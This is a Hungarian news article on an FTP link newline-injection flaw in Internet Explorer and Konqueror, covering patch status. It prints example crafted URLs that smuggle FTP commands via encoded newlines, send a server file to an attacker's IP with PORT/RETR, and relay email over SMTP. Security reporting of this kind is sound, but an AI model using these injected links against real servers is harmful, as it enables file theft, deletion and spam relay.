Közös hiba az Explorerben és a Konquerorban

Kapcsolódók (5)

Három kalózhálózatot számoltak fel

A tizenöt terabájtnyi filmet, szoftvert és zenét tartalmazó szerverek miskolci és budapesti lefoglalása nemzetközi szinten is az utóbbi évek legnagyobb fogása.

Újabb hiba az Internet Explorerben

A támadók teljes hozzáférést szerezhetnek a frissítés nélküli Windows XP-khez és 2000-ekhez.

Biztonsági hiba az XP tűzfalban

Az SP2 bevatkozása nyomán fatális megosztási gixer lép fel a modemes számítógépeken.

Biztonsági hiba a Mozillában

A hiba lehetővé teszi már telepített Windows XP-programok futtatását kívülről.

Újrahasznosított hiba az IE-ben

A hat év után feltámadt Frame Spoof elnevezésű biztonsági résre egyelőre nincs gyógyír.

A Linux alapú Konqueror és az Internet Explorer eddig nem sok közös hibán osztozott. Egy biztonsági szakértő viszont rájött, hogy mindkettő megbolondítható ftp-alapú parancsokkal.

A Linux alapú Konqueror és a Windowsba integrált Internet Explorer (IE) böngészőkben biztonsági kockázatot jelent bizonyos preparált ftp-linkek futtatása. Az ilyen linkekkel parancsok hajthatók végre az ftp-szerveren, sőt lehetséges akár email továbbítása is.

A spammelők felállíthatnak olyan weboldalakat, ahol a felhasználó például tetszőleges képre kattintva valójában emailt továbbít. Az érintett böngészők legfontosabb hiányossága, hogy nem értelmezik megfelelően az url-be kódolt új sor (Newline) jelet (%0a). Így ftp-parancsok csempészhetők a létrejött ftp-kapcsolatba, írta a heise.de híroldal.

A belépés sem akadály

Például:
ftp://ftpuser:ftppass@server/directory%0aftp-parancs%0a

A fenti példában még az sem jelent gondot, hogy a megkövetelik a felhasználó beléptetését, hiszen mindez egy linken belül megoldható. A biztonsági rés felfedezője, Albert Puigsech Galicia szerint ezt követően a szerver tetszőleges parancsokat küldhet, amint a felhasználó össze-vissza kattint az oldalon.

Így például a
ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
link arra utasítja a szervert, hogy a rajta tárolt fájlt az a,b,c,d IP-szamú támadóhoz továbbítsa. Ugyanígy nincsen akadálya annak sem, hogy fájlokat töröljenek a parancsokkal.

Indul az email

Mivel az ftp-kommunikáció bizonyos hasonlóságokat mutat az smtp-vel, bizonyos linkekkel az emailek küldése is megoldható.

A példa szerint:
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT
TO%3a%0d%0aDATA%0d%0aSubject%3a
hacked%0d%0aTo%3a user%40server%0d%0a%0d%0ahacked
%0d%0a.%0d%0a:victim@domain:25

A hiba Konqueror esetében a december 5., az Explorer esetében december 7. óta ismert. A KDE fejlesztői figyelmeztetést adtak ki, amelyben megadják a Konquerorban használt "FTP kioslave" komponens javításának elérhetőségét. A heise.de szerint a Linux-disztribútorokhoz már a javított KDE-csomagok kerülnek.

Az Explorer esetében még nincs javítás, viszont Windows XP SP2 alatt a hiba már nem aknázható ki. Az XP SP1 felhasználóknak a javítócsomag telepítése ajánlott, mivel ott egy sor további, régen felfedezett hibát is kijavítanak.

A Windows 2000 és az SP2-től elvágott XP felhasználók alternatív böngészők használatával oldhatják meg a problémát.

5 könyv
Több mint 600 meghökkentő, érdekes és tanulságos történet!

MEGVESZEM

Az oldalról ajánljuk

Bookline

Nyáry Krisztián
Itt kávéztak ők

8991 Ft

Richard Osman
Gyilkosokra utazunk

5382 Ft